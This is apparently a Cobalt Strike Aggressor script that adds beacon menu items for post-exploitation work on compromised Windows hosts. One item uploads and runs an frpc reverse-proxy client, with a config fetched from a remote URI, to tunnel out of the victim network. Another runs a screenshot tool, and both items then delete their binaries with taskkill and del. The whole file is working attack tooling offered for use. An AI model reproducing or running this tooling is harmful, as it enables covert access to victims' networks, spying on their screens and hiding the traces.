popup beacon_bottom {
    menu "Frp Proxy"{
        item "Upload" {
            $bid = $1;
            $dialog = dialog("Upload frpc", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &upload);
            drow_text($dialog, "UploadPath",  "path: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }
        sub upload {
            # switch to specify path
            bcd($bid, $3['UploadPath']);
            bsleep($bid, 0 ,0);
            if (-is64 $bid['id']) {
                bupload($bid, script_resource("/script/x64/frpc.exe"));
            }else{
                bupload($bid, script_resource("/script/x86/frpc.exe"));
            }
            show_message("Executing cmmand!");
        }
        item "Run"{
            $bid = $1;
            $dialog = dialog("Run frpc", %(uri => "http://x.x.x.x/frpc.ini or c:\\frpc.ini", bid => $bid), &run);
            drow_text($dialog, "uri",  "configURI: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub run{
            local('$Uri');
            $Uri =  $3['uri'];
            bshell($bid, "frpc.exe -c  $+ $Uri ");
            show_message("Executing cmmand!");
            bsleep($bid, 30, 0);
        }

        item "Delete" {
            # local("bid");
            bshell($1, "taskkill /f /t /im frpc.exe &&  del /f /s /q frpc.exe");
        }
    }

        item "screenshots" {
            $bid = $1;
            $dialog = dialog("Upload Screenshots", %(UploadPath => "C:\\Windows\\Temp\\", bid => $bid), &screenshots);
            drow_text($dialog, "UploadPath",  "path: ");
            dbutton_action($dialog, "ok");
            dialog_show($dialog);
        }

        sub screenshots {
            # switch to specify path
            bcd($bid, $3['UploadPath']);
            bsleep($bid, 0 ,0);
            $bin = $3['UploadPath'];
            bupload($bid, script_resource("/source/screenshot/Screenshooter.exe"));
            bshell($bid, "$bin $+ Screenshooter.exe")
            bshell($bid, "del $bin $+ Screenshooter.exe")
            # show_message("Executing cmmand!");
        }

}
